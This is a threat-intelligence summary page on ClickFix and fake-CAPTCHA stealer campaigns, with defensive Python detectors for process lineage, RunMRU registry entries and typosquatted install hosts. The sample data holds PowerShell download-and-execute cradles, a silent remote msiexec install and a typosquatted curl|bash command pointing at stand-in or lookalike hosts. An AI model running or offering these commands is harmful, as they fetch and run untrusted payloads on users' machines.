Mallory

Fake CAPTCHA and ClickFix Social Engineering Used to Deliver Stealer Malware

Tags: fake captcha, information stealer, clickfix, credential theft, phishing assessments, social engineering, fake job postings, telegram bots, browser credentials, typosquatting, rc4, cloudflare, http exfiltration, dll sideloading, cryptowallets
Updated February 17, 2026 at 12:05 AM · 3 sources

A wave of social-engineering-driven malware delivery is abusing “verification” and “fix” workflows to trick users into running attacker-supplied commands that install information stealers. LevelBlue reported a campaign that places fake Cloudflare-style CAPTCHA pages on compromised websites to convince Windows users to execute malicious PowerShell commands by hand, resulting in StealC deployment; the stealer is described as exfiltrating browser credentials, crypto wallet data, Steam and Outlook credentials, system information, and screenshots to a C2 server over HTTP with RC4-encrypted payloads. Intego also identified an evolved ClickFix technique on macOS (“Matryoshka”) that uses typosquatted domains to redirect users to pages instructing them to paste “fix” commands into Terminal; the loader then retrieves an AppleScript payload that steals browser credentials and targets wallet apps (e.g., Trezor Suite, Ledger Live), falling back to repeated fake password prompts to capture the user's password.

Separately, other credential-theft campaigns are also leaning heavily on lures that exploit user trust and routine workflows. Morphisec described Noodlophile evolving from fake AI video platform ads to fake job postings and phishing “assessments,” delivering multi-stage stealers/RATs via techniques including DLL sideloading, while continuing to use Telegram bots for exfiltration/C2 and adding file-bloating content intended to disrupt automated analysis. These developments reinforce that user-in-the-loop execution (copy/paste commands, “verification” steps, and recruitment-themed forms) remains a high-yield initial access vector for stealers on both Windows and macOS: because the victim launches the command, there is no downloaded file for browser download protections to inspect, and the first thing a defender can observe is the interpreter the user started.
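As an added example (not code from LevelBlue, Intego or Morphisec), the following Python scores process-creation telemetry for the Windows side of this pattern. A command pasted into Win+R shows up as an interpreter spawned directly by `explorer.exe` with the whole one-liner on its command line, and the `SyncAppvPublishingServer.vbs` proxy variant described in the ClearFake story below shows up as PowerShell under `wscript.exe`. Field names follow Sysmon Event ID 1; the sample records, hosts, paths and command lines are constructed, not indicators from these campaigns.

```python
"""Flag ClickFix-style executions in Windows process-creation telemetry.

Added example for this page; not code from LevelBlue, Intego, Expel or Morphisec.
Records mimic Sysmon Event ID 1 fields; hosts, paths and command lines are
constructed assumptions, not indicators from the campaigns described.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcessEvent:
    image: str
    command_line: str
    parent_image: str
    parent_command_line: str


# Interpreters a command pasted into the Run dialog typically lands in.
RUN_DIALOG_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "msiexec.exe",
                       "cmd.exe", "wscript.exe", "cscript.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Command-line features common to ClickFix one-liners. Each is weak alone; the
# lineage check below is what gives the rule its precision.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl)\b", re.I),
    "iex": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "remote_msi": re.compile(r"/(i|package)\s+https?://", re.I),
    "quiet_install": re.compile(r"/q(n|b|uiet)?\b", re.I),
    # Trusted script that launches a hidden PowerShell (the ClearFake proxy).
    "appv_proxy": re.compile(r"syncappvpublishingserver\.vbs", re.I),
}


def _name(path: str) -> str:
    return PureWindowsPath(path.strip('"')).name.lower()


def indicator_hits(command_line: str) -> List[str]:
    return [name for name, rx in INDICATORS.items() if rx.search(command_line)]


def lineage(event: ProcessEvent) -> Optional[str]:
    """Label the suspicious launch path, or None when it is not one."""
    child, parent = _name(event.image), _name(event.parent_image)
    if child not in RUN_DIALOG_CHILDREN:
        return None
    if parent == "explorer.exe":            # Win+R runs the typed command from explorer.exe
        return f"explorer.exe->{child}"
    if parent in SCRIPT_HOSTS and INDICATORS["appv_proxy"].search(event.parent_command_line):
        return f"SyncAppvPublishingServer.vbs->{child}"   # proxied variant
    return None


def evaluate(event: ProcessEvent) -> Optional[dict]:
    path = lineage(event)
    if path is None:
        return None
    hits = indicator_hits(event.command_line)
    if path.startswith("SyncAppv"):
        # The cradle is passed as the .vbs argument, so score the parent's command line too.
        hits = sorted(set(hits) | set(indicator_hits(event.parent_command_line)))
    if not hits:
        return None   # a bare console opened from Win+R or a shortcut is routine; demand an indicator
    return {"lineage": path, "indicators": hits, "command_line": event.command_line}


def scan(events: List[ProcessEvent]) -> List[dict]:
    return [r for r in (evaluate(e) for e in events) if r is not None]


# Constructed sample records (assumptions, not observed data).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
CRADLE = "iwr http://verify-captcha.example/r.ps1 -UseBasicParsing | iex"
SUSPICIOUS = [
    ProcessEvent(PS, f'powershell.exe -w hidden -c "{CRADLE}"', EXPLORER, EXPLORER),
    ProcessEvent(PS, f'powershell.exe -WindowStyle Hidden -Command "n;{CRADLE}"',
                 r"C:\Windows\System32\wscript.exe",
                 f'wscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs "n;{CRADLE}"'),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 "msiexec /i https://cdn.example/verify.msi /qn", EXPLORER, EXPLORER),
]
BENIGN = [
    ProcessEvent(PS, f'"{PS}"', EXPLORER, EXPLORER),
    ProcessEvent(PS, "powershell.exe -NoLogo -NoProfile",
                 r"C:\Program Files\Microsoft VS Code\Code.exe", "Code.exe"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs",
                 r"C:\Windows\System32\services.exe", "services.exe"),
]
SAMPLE_EVENTS = SUSPICIOUS + BENIGN

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["lineage"], alert["indicators"])
```

The rule deliberately does not fire on a plain `explorer.exe` to `powershell.exe` launch, since a Start-menu shortcut produces the same parent; it is the combination of that parent with a download cradle, hidden-window switch, encoded command or silent remote MSI on the command line that separates a pasted ClickFix one-liner from an administrator opening a console.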

Related Stories

Fake CAPTCHA/ClickFix Social Engineering Used to Deliver Malware and Steal Sessions

Threat actors are increasingly using **fake CAPTCHA / verification pages** as a scalable social-engineering lure to deliver malware and steal credentials by abusing users’ trust in routine web security checks. Research highlighted a large, fragmented ecosystem of lookalike fake CAPTCHA pages hosted across **9,494 compromised sites and malicious properties**, where roughly **70%** of observed pages share near-identical visuals while delivering **dozens of distinct payload variants** through different execution models, including clipboard-driven instructions that lead victims to run **PowerShell** or **VBScript** downloaders. Separately, a **ClickFix** campaign targeting Facebook users, especially content creators and businesses seeking verification, uses fake “verification” portals to trick victims into manually extracting and submitting browser session tokens (notably the `c_user` and `xs` cookies) through the browser's developer tools, enabling account takeover without exploiting any software vulnerability; because the victim reads the cookies out of their own authenticated session, protections such as the `HttpOnly` flag and login-time MFA never come into play. In parallel, the **ClearFake** campaign (a malicious JavaScript framework injected into hacked websites) has adopted ClickFix-style fake CAPTCHA lures and added more evasive “living off the land” behavior, including **proxy execution** to run PowerShell through trusted Windows features and shifting distribution to a **popular CDN**, reducing the effectiveness of defenses that rely primarily on blocking known-bad domains/IPs.

1 month ago
Fake CAPTCHA (ClickFix) Social Engineering Used for Fileless Malware Delivery

Security researchers reported an active malware distribution technique that abuses **bogus CAPTCHA** pages to trick users into executing attacker-supplied commands on Windows. In the **ClearFake** campaign analyzed by Expel, victims land on a compromised site and are instructed to press `Win + R`, then paste and run a clipboard-seeded command—an approach commonly referred to as **ClickFix**—which results in malicious **PowerShell** execution. The campaign emphasizes *living-off-the-land* tradecraft and evasion, including **proxy execution** by abusing the trusted Windows script `C:\Windows\System32\SyncAppvPublishingServer.vbs` to launch PowerShell in hidden mode and reduce the chance of AV detection. For defenders, the useful property of the Win+R path is that the pasted one-liner (download cradle, hidden-window switch and all) lands on the command line of a process whose parent is `explorer.exe`, or of `wscript.exe` in the proxied case, which a console opened from a shortcut does not produce. Separate measurement and telemetry on the same broader tactic found large-scale infrastructure supporting fake CAPTCHA lures: a Censys analysis identified **9,494** breached websites hosting counterfeit verification pages, with ~**70%** appearing nearly identical. The most common infection mechanisms involved **clipboard manipulation** leading to **VBScript** and **PowerShell** execution (both observed in significant numbers), alongside other delivery paths such as `MSIEXEC`-based installation of malicious Windows Installer packages. Researchers also observed use of the **Matrix** push command-and-control framework to support **fileless** deployment, noting that these intrusions may leave no executable on disk and therefore evade file-based signature detection, which pushes detection toward process lineage, command-line telemetry and host artifacts.
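Live process telemetry is not always available after the fact, but the Run dialog leaves its own artifact. Windows records commands entered via Win+R under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`: one lettered `REG_SZ` value per command, each ending in a literal `\1` marker, plus an `MRUList` value whose letters give most-recent-first order. The following added example (not code from Expel or Censys) parses a `reg export` of that key, restores the order, strips the marker and flags entries that reach out to a URL or invoke `mshta`. The export text is constructed; the host in it is an assumption.

```python
"""Recover commands run through the Win+R dialog from a RunMRU registry export.

Added example for this page, not code from Expel or Censys. The .reg text below
is constructed; the commands and host it contains are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

RUNMRU_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
KEY_LINE = re.compile(r"^\[(.+)\]$")
VALUE_LINE = re.compile(r'^"([^"]+)"="(.*)"$')
# Weak triage heuristic: a Run-dialog command that fetches a URL or launches mshta.
SUSPECT = re.compile(r"https?://|\bmshta\b", re.I)


@dataclass
class RunEntry:
    rank: int          # 0 = most recent, per MRUList
    letter: str        # value name under RunMRU
    command: str       # command as typed, without the trailing "\1" marker
    suspicious: bool


def _unescape(value: str) -> str:
    # reg export writes backslashes as \\ and quotes as \" inside REG_SZ data.
    return re.sub(r"\\(.)", r"\1", value)


def parse_runmru(reg_text: str) -> List[RunEntry]:
    """Return RunMRU entries in most-recent-first order; empty if the key is absent."""
    in_key = False
    values: Dict[str, str] = {}
    for raw in reg_text.splitlines():
        line = raw.strip()
        key = KEY_LINE.match(line)
        if key:
            in_key = key.group(1).lower() == RUNMRU_KEY.lower()
            continue
        value = VALUE_LINE.match(line) if in_key else None
        if value:
            values[value.group(1)] = _unescape(value.group(2))
    entries = []
    for rank, letter in enumerate(values.get("MRUList", "")):
        if letter not in values:
            continue                      # MRUList can reference a value that was removed
        cmd = values[letter]
        if cmd.endswith("\\1"):
            cmd = cmd[:-2]                # Explorer appends "\1" to every RunMRU command
        entries.append(RunEntry(rank, letter, cmd, bool(SUSPECT.search(cmd))))
    return entries


# Constructed export, as produced by: reg export "HKCU\...\Explorer\RunMRU" runmru.reg
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="cmd\\1"
"c"="powershell -w hidden -c \"iwr http://verify-captcha.example/r.ps1 | iex\"\\1"
"MRUList"="cba"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths]
"url1"="C:\\Users\\victim\\Downloads"
'''

if __name__ == "__main__":
    for entry in parse_runmru(SAMPLE_REG):
        flag = "SUSPECT" if entry.suspicious else "       "
        print(f"{entry.rank} {entry.letter} {flag} {entry.command}")
```

On a live Windows host the same values can be read with the standard-library `winreg` module, and for a dead-box case from the user's `NTUSER.DAT`; parsing an export keeps the example portable. Two caveats apply: the key is only populated when the Run dialog is actually used, and the user (or malware) can clear it, so an empty RunMRU does not rule a ClickFix execution out.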

1 month ago
ClickFix Social Engineering Drives Multi-Platform Malware Delivery

Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
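The Homebrew case above turns on a single host swapped inside an otherwise familiar one-liner. The following added example (not code from CERT Polska or the other researchers cited) pulls every URL out of a pasted install command and classifies each host as expected, a lookalike of a brand token by edit distance, or simply unexpected. The expected-host set and brand tokens are assumptions; the genuine Homebrew command is reproduced from memory and the altered one is constructed to mirror the `raw.homabrews.org` swap described in the story.

```python
"""Check the hosts in a pasted install one-liner against the ones it should use.

Added example for this page, not code from the researchers cited. The genuine
Homebrew one-liner is reproduced from memory as an assumption; the altered
command is constructed to mirror the raw.homabrews.org swap described above.
"""
import re
from typing import Dict, List, Set
from urllib.parse import urlparse

# Hosts the real Homebrew installer is expected to fetch from (assumption).
EXPECTED_HOSTS: Set[str] = {"raw.githubusercontent.com", "github.com"}
# Brand tokens whose near-misses in a hostname label signal a typosquat.
BRAND_TOKENS = ("homebrew", "brew", "github", "githubusercontent")
URL_RE = re.compile(r"https?://[^\s'\"|;)>]+")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance via the standard dynamic-programming row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def extract_hosts(command: str) -> List[str]:
    hosts = []
    for url in URL_RE.findall(command):
        host = urlparse(url).hostname
        if host:
            hosts.append(host.lower())
    return hosts


def classify_host(host: str, expected: Set[str] = EXPECTED_HOSTS) -> Dict[str, object]:
    if host in expected:
        return {"host": host, "verdict": "expected", "label": None, "closest": None, "distance": 0}
    candidates = []
    for label in host.split("."):
        for token in BRAND_TOKENS:
            d = edit_distance(label, token)
            if d <= max(1, len(token) // 4):   # tolerate about one edit per four characters
                candidates.append((d, token, label))
    if candidates:
        d, token, label = min(candidates)
        return {"host": host, "verdict": "lookalike", "label": label, "closest": token, "distance": d}
    return {"host": host, "verdict": "unexpected", "label": None, "closest": None, "distance": None}


def check_install_command(command: str) -> List[Dict[str, object]]:
    return [classify_host(h) for h in extract_hosts(command)]


def all_hosts_expected(command: str) -> bool:
    """True when every URL in the command points at an expected host (vacuously true with no URL)."""
    return all(h in EXPECTED_HOSTS for h in extract_hosts(command))


# Genuine one-liner (from memory, assumption) and a constructed typosquatted copy.
GENUINE = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
ALTERED = '/bin/bash -c "$(curl -fsSL https://raw.homabrews.org/Homebrew/install/HEAD/install.sh)"'

if __name__ == "__main__":
    for cmd in (GENUINE, ALTERED):
        for verdict in check_install_command(cmd):
            print(verdict)
```

The relative threshold matters: with a flat cutoff of two edits, the harmless label `raw` would be reported as a lookalike of `brew`, whereas scaling by token length keeps `homabrews` (two edits from `homebrew`) flagged and leaves `raw` alone. A host that matches no brand token at all is still reported as `unexpected`, so the check fails closed rather than trusting an unfamiliar domain.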

3 weeks ago
